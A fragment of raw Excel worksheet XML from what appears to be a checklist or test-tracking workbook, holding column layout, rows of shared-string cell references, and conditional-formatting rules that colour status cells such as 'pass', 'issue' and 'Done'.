    <cfRule type="cellIs" dxfId="5" priority="31" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="32" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="33" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H4:H8">
    <cfRule type="cellIs" dxfId="3" priority="27" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="26" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="25" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12:H14">
    <cfRule type="cellIs" dxfId="3" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I4:I8">
    <cfRule type="containsText" dxfId="0" priority="30" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="29" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="28" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I4)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I12:I14">
    <cfRule type="containsText" dxfId="0" priority="6" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="5" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="4" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I12)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H4:H14">
      <formula1>$A$16:$A$23</formula1>
    </dataValidation>
  </dataValidation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3"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="I11" sqref="I11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.1"/>
  <cols>
    <col min="1" max="1" width="9" style="11"/>
    <col min="2" max="2" width="12.5765765765766" style="11" customWidth="1"/>
    <col min="3" max="3" width="41.1891891891892" style="11" customWidth="1"/>
    <col min="4" max="4" width="86.3873873873874" style="11" customWidth="1"/>
    <col min="5" max="5" width="31.9459459459459" style="11" customWidth="1"/>
    <col min="6" max="6" width="19.7567567567568" style="11" customWidth="1"/>
    <col min="7" max="7" width="17.3243243243243" style="11" customWidth="1"/>
    <col min="8" max="8" width="9" style="11"/>
    <col min="9" max="9" width="14.7477477477477" style="11" customWidth="1"/>
    <col min="10" max="10" width="12.8558558558559" style="11" customWidth="1"/>
    <col min="11" max="16384" width="9" style="11"/>
  </cols>
  <sheetData>
    <row r="1" s="11" customFormat="1" ht="18.4" spans="1:10">
      <c r="A1" s="1" t="s">
        <v>511</v>
      </c>
      <c r="B1" s="1"/>
      <c r="C1" s="1"/>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="1"/>
    </row>
    <row r="3" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A3" s="5" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="5" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="5" t="s">
        <v>3</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>4</v>
      </c>
      <c r="E3" s="5" t="s">
        <v>5</v>
      </c>
      <c r="F3" s="5" t="s">
        <v>6</v>
      </c>
      <c r="G3" s="5" t="s">
        <v>7</v>
      </c>
      <c r="H3" s="5" t="s">
        <v>8</v>
      </c>
      <c r="I3" s="5" t="s">
        <v>9</v>
      </c>
      <c r="J3" s="5" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="4" s="11" customFormat="1" ht="56.55" spans="1:10">
      <c r="A4" s="12" t="s">
        <v>512</v>
      </c>
      <c r="B4" s="13" t="s">
        <v>513</v>
      </c>
      <c r="C4" s="14" t="s">
        <v>514</v>
      </c>
      <c r="D4" s="15" t="s">
        <v>515</v>
      </c>
      <c r="E4" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F4" s="34" t="s">
        <v>102</v>
      </c>
      <c r="G4" s="34" t="s">
        <v>516</v>
      </c>
      <c r="H4" s="17"/>
      <c r="I4" s="32"/>
      <c r="J4" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="5" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A5" s="12" t="s">
        <v>517</v>
      </c>
      <c r="B5" s="13" t="s">
        <v>518</v>
      </c>
      <c r="C5" s="14" t="s">
        <v>519</v>
      </c>
      <c r="D5" s="15" t="s">
        <v>520</v>
      </c>
      <c r="E5" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F5" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G5" s="34" t="s">
        <v>322</v>
      </c>
      <c r="H5" s="17"/>
      <c r="I5" s="32"/>
      <c r="J5" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="6" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A6" s="12" t="s">
        <v>521</v>
      </c>
      <c r="B6" s="13" t="s">
        <v>522</v>
      </c>
      <c r="C6" s="35" t="s">
        <v>523</v>
      </c>
      <c r="D6" s="36" t="s">
        <v>70</v>
      </c>
      <c r="E6" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F6" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G6" s="34" t="s">
        <v>524</v>
      </c>
      <c r="H6" s="17"/>
      <c r="I6" s="32"/>
      <c r="J6" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="7" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A7" s="18"/>
      <c r="B7" s="19"/>
      <c r="C7" s="20"/>
      <c r="D7" s="21"/>
      <c r="E7" s="26"/>
      <c r="F7" s="24"/>
      <c r="G7" s="24"/>
      <c r="H7" s="24"/>
      <c r="I7" s="33"/>
      <c r="J7" s="20"/>
    </row>
    <row r="8" s="11" customFormat="1" ht="14.55" spans="2:10">
      <c r="B8" s="19"/>
      <c r="C8" s="20"/>
      <c r="D8" s="21"/>
      <c r="E8" s="26"/>
      <c r="F8" s="24"/>
      <c r="G8" s="24"/>
      <c r="H8" s="24"/>
      <c r="I8" s="33"/>
      <c r="J8" s="20"/>
    </row>
    <row r="9" s="11" customFormat="1" ht="14.55" spans="1:10">
      <c r="A9" s="25" t="s">
        <v>67</v>
      </c>
      <c r="B9" s="19"/>
      <c r="C9" s="20"/>
      <c r="D9" s="21"/>
      <c r="E9" s="29"/>
      <c r="F9" s="24"/>
      <c r="G9" s="24"/>
      <c r="H9" s="24"/>
      <c r="I9" s="33"/>
      <c r="J9" s="20"/>
    </row>
    <row r="10" s="11" customFormat="1" ht="14.55" spans="1:10">
      <c r="A10" s="27" t="s">
        <v>68</v>
      </c>
      <c r="B10" s="19"/>
      <c r="C10" s="20"/>
      <c r="D10" s="21"/>
      <c r="E10" s="29"/>
      <c r="F10" s="30"/>
      <c r="G10" s="30"/>
      <c r="H10" s="24"/>
      <c r="I10" s="33"/>
      <c r="J10" s="20"/>
    </row>
    <row r="11" s="11" customFormat="1" ht="14.55" spans="1:10">
      <c r="A11" s="28" t="s">
        <v>69</v>
      </c>
      <c r="B11" s="19"/>
      <c r="C11" s="20"/>
      <c r="D11" s="21"/>
      <c r="E11" s="29"/>
      <c r="F11" s="24"/>
      <c r="G11" s="24"/>
      <c r="H11" s="24"/>
      <c r="I11" s="33"/>
      <c r="J11" s="20"/>
    </row>
    <row r="12" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A12" s="17" t="s">
        <v>70</v>
      </c>
      <c r="B12" s="19"/>
      <c r="C12" s="20"/>
      <c r="D12" s="21"/>
      <c r="E12" s="29"/>
      <c r="F12" s="24"/>
      <c r="G12" s="24"/>
      <c r="H12" s="24"/>
      <c r="I12" s="33"/>
      <c r="J12" s="20"/>
    </row>
    <row r="13" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A13" s="18"/>
      <c r="B13" s="19"/>
      <c r="C13" s="20"/>
      <c r="D13" s="21"/>
      <c r="E13" s="29"/>
      <c r="F13" s="24"/>
      <c r="G13" s="24"/>
      <c r="H13" s="24"/>
      <c r="I13" s="33"/>
      <c r="J13" s="20"/>
    </row>
    <row r="14" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A14" s="18"/>
      <c r="B14" s="19"/>
      <c r="C14" s="20"/>
      <c r="D14" s="21"/>
      <c r="E14" s="26"/>
      <c r="F14" s="24"/>
      <c r="G14" s="24"/>
      <c r="H14" s="24"/>
      <c r="I14" s="33"/>
      <c r="J14" s="20"/>
    </row>
    <row r="15" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A15" s="18"/>
      <c r="B15" s="19"/>
      <c r="C15" s="20"/>
      <c r="D15" s="31"/>
      <c r="E15" s="26"/>
      <c r="F15" s="24"/>
      <c r="G15" s="24"/>
      <c r="H15" s="20"/>
      <c r="I15" s="20"/>
      <c r="J15" s="20"/>
    </row>
    <row r="16" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A16" s="18"/>
      <c r="B16" s="19"/>
      <c r="C16" s="20"/>
      <c r="D16" s="20"/>
      <c r="E16" s="26"/>
      <c r="F16" s="24"/>
      <c r="G16" s="24"/>
      <c r="H16" s="20"/>
      <c r="I16" s="20"/>
      <c r="J16" s="20"/>
    </row>
    <row r="17" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A17" s="18"/>
      <c r="B17" s="19"/>
      <c r="C17" s="20"/>
      <c r="D17" s="31"/>
      <c r="E17" s="26"/>
      <c r="F17" s="24"/>
      <c r="G17" s="24"/>
      <c r="H17" s="20"/>
      <c r="I17" s="20"/>
      <c r="J17" s="20"/>
    </row>
    <row r="18" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A18" s="18"/>
      <c r="B18" s="19"/>
      <c r="C18" s="20"/>
      <c r="D18" s="31"/>
      <c r="E18" s="26"/>
      <c r="F18" s="24"/>
      <c r="G18" s="24"/>
      <c r="H18" s="20"/>
      <c r="I18" s="20"/>
      <c r="J18" s="20"/>
    </row>
    <row r="19" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A19" s="18"/>
      <c r="B19" s="19"/>
      <c r="C19" s="20"/>
      <c r="D19" s="31"/>
      <c r="E19" s="26"/>
      <c r="F19" s="23"/>
      <c r="G19" s="23"/>
      <c r="H19" s="20"/>
      <c r="I19" s="20"/>
      <c r="J19" s="20"/>
    </row>
    <row r="20" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A20" s="18"/>
      <c r="B20" s="19"/>
      <c r="C20" s="20"/>
      <c r="D20" s="31"/>
      <c r="E20" s="26"/>
      <c r="F20" s="24"/>
      <c r="G20" s="24"/>
      <c r="H20" s="20"/>
      <c r="I20" s="20"/>
      <c r="J20" s="20"/>
    </row>
    <row r="21" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A21" s="18"/>
      <c r="B21" s="19"/>
      <c r="C21" s="20"/>
      <c r="D21" s="31"/>
      <c r="E21" s="26"/>
      <c r="F21" s="24"/>
      <c r="G21" s="24"/>
      <c r="H21" s="20"/>
      <c r="I21" s="20"/>
      <c r="J21" s="20"/>
    </row>
    <row r="22" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A22" s="18"/>
      <c r="B22" s="19"/>
      <c r="C22" s="20"/>
      <c r="D22" s="31"/>
      <c r="E22" s="26"/>
      <c r="F22" s="24"/>
      <c r="G22" s="24"/>
      <c r="H22" s="20"/>
      <c r="I22" s="20"/>
      <c r="J22" s="20"/>
    </row>
    <row r="23" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A23" s="18"/>
      <c r="B23" s="19"/>
      <c r="C23" s="20"/>
      <c r="D23" s="31"/>
      <c r="E23" s="26"/>
      <c r="F23" s="24"/>
      <c r="G23" s="24"/>
      <c r="H23" s="20"/>
      <c r="I23" s="20"/>
      <c r="J23" s="20"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A1:J1"/>
    <mergeCell ref="A2:J2"/>
  </mergeCells>
  <conditionalFormatting sqref="I1:J1">
    <cfRule type="containsText" dxfId="0" priority="42" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="41" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="40" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H9">
    <cfRule type="cellIs" dxfId="3" priority="21" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="20" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="19" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I9">
    <cfRule type="containsText" dxfId="0" priority="24" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I9)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="23" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I9)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="22" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I9)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A10">
    <cfRule type="cellIs" dxfId="5" priority="37" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="38" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="39" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H10">
    <cfRule type="cellIs" dxfId="3" priority="15" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="14" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="13" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I10">
    <cfRule type="containsText" dxfId="0" priority="18" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="17" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="16" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I10)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A11">
    <cfRule type="cellIs" dxfId="5" priority="34" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="35" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="36" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H11">
    <cfRule type="cellIs" dxfId="3" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I11">
    <cfRule type="containsText" dxfId="0" priority="12" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I11)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="11" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I11)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="10" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I11)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A12">
    <cfRule type="cellIs" dxfId="5" priority="31" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="32" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="33" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H4:H8">
    <cfRule type="cellIs" dxfId="3" priority="27" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="26" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="25" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12:H14">
    <cfRule type="cellIs" dxfId="3" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I4:I8">
    <cfRule type="containsText" dxfId="0" priority="30" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="29" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="28" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I4)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I12:I14">
    <cfRule type="containsText" dxfId="0" priority="6" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="5" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="4" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I12)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H4:H14">
      <formula1>$A$16:$A$23</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3"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D17" sqref="D17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.1"/>
  <cols>
    <col min="1" max="1" width="9" style="11"/>
    <col min="2" max="2" width="12.5765765765766" style="11" customWidth="1"/>
    <col min="3" max="3" width="41.1891891891892" style="11" customWidth="1"/>
    <col min="4" max="4" width="86.3873873873874" style="11" customWidth="1"/>
    <col min="5" max="5" width="31.9459459459459" style="11" customWidth="1"/>
    <col min="6" max="6" width="19.7567567567568" style="11" customWidth="1"/>
    <col min="7" max="7" width="17.3243243243243" style="11" customWidth="1"/>
    <col min="8" max="8" width="9" style="11"/>
    <col min="9" max="9" width="14.7477477477477" style="11" customWidth="1"/>
    <col min="10" max="10" width="12.8558558558559" style="11" customWidth="1"/>
    <col min="11" max="16384" width="9" style="11"/>
  </cols>
  <sheetData>
    <row r="1" s="11" customFormat="1" ht="18.4" spans="1:10">
      <c r="A1" s="1" t="s">
        <v>525</v>
      </c>
      <c r="B1" s="1"/>
      <c r="C1" s="1"/>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="1"/>
    </row>
    <row r="3" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A3" s="5" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="5" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="5" t="s">
        <v>3</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>4</v>
      </c>
      <c r="E3" s="5" t="s">
        <v>5</v>
      </c>
      <c r="F3" s="5" t="s">
        <v>6</v>
      </c>
      <c r="G3" s="5" t="s">
        <v>7</v>
      </c>
      <c r="H3" s="5" t="s">
        <v>8</v>
      </c>
      <c r="I3" s="5" t="s">
        <v>9</v>
      </c>
      <c r="J3" s="5" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="4" s="11" customFormat="1" ht="42.45" spans="1:10">
      <c r="A4" s="12" t="s">
        <v>526</v>
      </c>
      <c r="B4" s="13" t="s">
        <v>527</v>
      </c>
      <c r="C4" s="14" t="s">
        <v>528</v>
      </c>
      <c r="D4" s="15" t="s">
        <v>529</v>
      </c>
      <c r="E4" s="16" t="s">
        <v>530</v>
      </c>
      <c r="F4" s="17" t="s">
        <v>321</v>
      </c>
      <c r="G4" s="17" t="s">
        <v>531</v>
      </c>
      <c r="H4" s="17"/>
      <c r="I4" s="32"/>
      <c r="J4" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="5" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A5" s="18"/>
      <c r="B5" s="19"/>
      <c r="C5" s="20"/>
      <c r="D5" s="21"/>
      <c r="E5" s="22"/>
      <c r="F5" s="23"/>
      <c r="G5" s="23"/>
      <c r="H5" s="24"/>
      <c r="I5" s="33"/>
      <c r="J5" s="20"/>
    </row>
    <row r="6" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A6" s="18"/>
      <c r="B6" s="19"/>
      <c r="C6" s="20"/>
      <c r="D6" s="21"/>
      <c r="E6" s="22"/>
      <c r="F6" s="23"/>
      <c r="G6" s="23"/>
      <c r="H6" s="24"/>
      <c r="I6" s="33"/>
      <c r="J6" s="20"/>
    </row>
    <row r="7" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A7" s="25" t="s">
        <v>67</v>
      </c>
      <c r="B7" s="19"/>
      <c r="C7" s="20"/>
      <c r="D7" s="21"/>
      <c r="E7" s="26"/>
      <c r="F7" s="24"/>
      <c r="G7" s="24"/>
      <c r="H7" s="24"/>
      <c r="I7" s="33"/>
      <c r="J7" s="20"/>
    </row>
    <row r="8" s="11" customFormat="1" ht="14.55" spans="1:10">
      <c r="A8" s="27" t="s">
        <v>68</v>
      </c>
      <c r="B8" s="19"/>
      <c r="C8" s="20"/>
      <c r="D8" s="21"/>
      <c r="E8" s="26"/>
      <c r="F8" s="24"/>
      <c r="G8" s="24"/>
      <c r="H8" s="24"/>
      <c r="I8" s="33"/>
      <c r="J8" s="20"/>
    </row>
    <row r="9" s="11" customFormat="1" ht="14.55" spans="1:10">
      <c r="A9" s="28" t="s">
        <v>69</v>
      </c>
      <c r="B9" s="19"/>
      <c r="C9" s="20"/>
      <c r="D9" s="21"/>
      <c r="E9" s="29"/>
      <c r="F9" s="24"/>
      <c r="G9" s="24"/>
      <c r="H9" s="24"/>
      <c r="I9" s="33"/>
      <c r="J9" s="20"/>
    </row>
    <row r="10" s="11" customFormat="1" ht="14.55" spans="1:10">
      <c r="A10" s="17" t="s">
        <v>70</v>
      </c>
      <c r="B10" s="19"/>
      <c r="C10" s="20"/>
      <c r="D10" s="21"/>
      <c r="E10" s="29"/>
      <c r="F10" s="30"/>
      <c r="G10" s="30"/>
      <c r="H10" s="24"/>
      <c r="I10" s="33"/>
      <c r="J10" s="20"/>
    </row>
    <row r="11" s="11" customFormat="1" ht="14.55" spans="2:10">
      <c r="B11" s="19"/>
      <c r="C11" s="20"/>
      <c r="D11" s="21"/>
      <c r="E11" s="29"/>
      <c r="F11" s="24"/>
      <c r="G11" s="24"/>
      <c r="H11" s="24"/>
      <c r="I11" s="33"/>
      <c r="J11" s="20"/>
    </row>
    <row r="12" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A12" s="18"/>
      <c r="B12" s="19"/>
      <c r="C12" s="20"/>
      <c r="D12" s="21"/>
      <c r="E12" s="29"/>
      <c r="F12" s="24"/>
      <c r="G12" s="24"/>
      <c r="H12" s="24"/>
      <c r="I12" s="33"/>
      <c r="J12" s="20"/>
    </row>
    <row r="13" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A13" s="18"/>
      <c r="B13" s="19"/>
      <c r="C13" s="20"/>
      <c r="D13" s="21"/>
      <c r="E13" s="29"/>
      <c r="F13" s="24"/>
      <c r="G13" s="24"/>
      <c r="H13" s="24"/>
      <c r="I13" s="33"/>
      <c r="J13" s="20"/>
    </row>
    <row r="14" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A14" s="18"/>
      <c r="B14" s="19"/>
      <c r="C14" s="20"/>
      <c r="D14" s="21"/>
      <c r="E14" s="26"/>
      <c r="F14" s="24"/>
      <c r="G14" s="24"/>
      <c r="H14" s="24"/>
      <c r="I14" s="33"/>
      <c r="J14" s="20"/>
    </row>
    <row r="15" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A15" s="18"/>
      <c r="B15" s="19"/>
      <c r="C15" s="20"/>
      <c r="D15" s="31"/>
      <c r="E15" s="26"/>
      <c r="F15" s="24"/>
      <c r="G15" s="24"/>
      <c r="H15" s="20"/>
      <c r="I15" s="20"/>
      <c r="J15" s="20"/>
    </row>
    <row r="16" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A16" s="18"/>
      <c r="B16" s="19"/>
      <c r="C16" s="20"/>
      <c r="D16" s="20"/>
      <c r="E16" s="26"/>
      <c r="F16" s="24"/>
      <c r="G16" s="24"/>
      <c r="H16" s="20"/>
      <c r="I16" s="20"/>
      <c r="J16" s="20"/>
    </row>
    <row r="17" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A17" s="18"/>
      <c r="B17" s="19"/>
      <c r="C17" s="20"/>
      <c r="D17" s="31"/>
      <c r="E17" s="26"/>
      <c r="F17" s="24"/>
      <c r="G17" s="24"/>
      <c r="H17" s="20"/>
      <c r="I17" s="20"/>
      <c r="J17" s="20"/>
    </row>
    <row r="18" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A18" s="18"/>
      <c r="B18" s="19"/>
      <c r="C18" s="20"/>
      <c r="D18" s="31"/>
      <c r="E18" s="26"/>
      <c r="F18" s="24"/>
      <c r="G18" s="24"/>
      <c r="H18" s="20"/>
      <c r="I18" s="20"/>
      <c r="J18" s="20"/>
    </row>
    <row r="19" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A19" s="18"/>
      <c r="B19" s="19"/>
      <c r="C19" s="20"/>
      <c r="D19" s="31"/>
      <c r="E19" s="26"/>
      <c r="F19" s="23"/>
      <c r="G19" s="23"/>
      <c r="H19" s="20"/>
      <c r="I19" s="20"/>
      <c r="J19" s="20"/>
    </row>
    <row r="20" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A20" s="18"/>
      <c r="B20" s="19"/>
      <c r="C20" s="20"/>
      <c r="D20" s="31"/>
      <c r="E20" s="26"/>
      <c r="F20" s="24"/>
      <c r="G20" s="24"/>
      <c r="H20" s="20"/>
      <c r="I20" s="20"/>
      <c r="J20" s="20"/>
    </row>
    <row r="21" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A21" s="18"/>
      <c r="B21" s="19"/>
      <c r="C21" s="20"/>
      <c r="D21" s="31"/>
      <c r="E21" s="26"/>
      <c r="F21" s="24"/>
      <c r="G21" s="24"/>
      <c r="H21" s="20"/>
      <c r="I21" s="20"/>
      <c r="J21" s="20"/>
    </row>
    <row r="22" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A22" s="18"/>
      <c r="B22" s="19"/>
      <c r="C22" s="20"/>
      <c r="D22" s="31"/>
      <c r="E22" s="26"/>
      <c r="F22" s="24"/>
      <c r="G22" s="24"/>
      <c r="H22" s="20"/>
      <c r="I22" s="20"/>
      <c r="J22" s="20"/>
    </row>
    <row r="23" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A23" s="18"/>
      <c r="B23" s="19"/>
      <c r="C23" s="20"/>
      <c r="D23" s="31"/>
      <c r="E23" s="26"/>
      <c r="F23" s="24"/>
      <c r="G23" s="24"/>
      <c r="H23" s="20"/>
      <c r="I23" s="20"/>
      <c r="J23" s="20"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A1:J1"/>
    <mergeCell ref="A2:J2"/>
  </mergeCells>
  <conditionalFormatting sqref="I1:J1">
    <cfRule type="containsText" dxfId="0" priority="48" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="47" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="46" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H4">
    <cfRule type="cellIs" dxfId="3" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
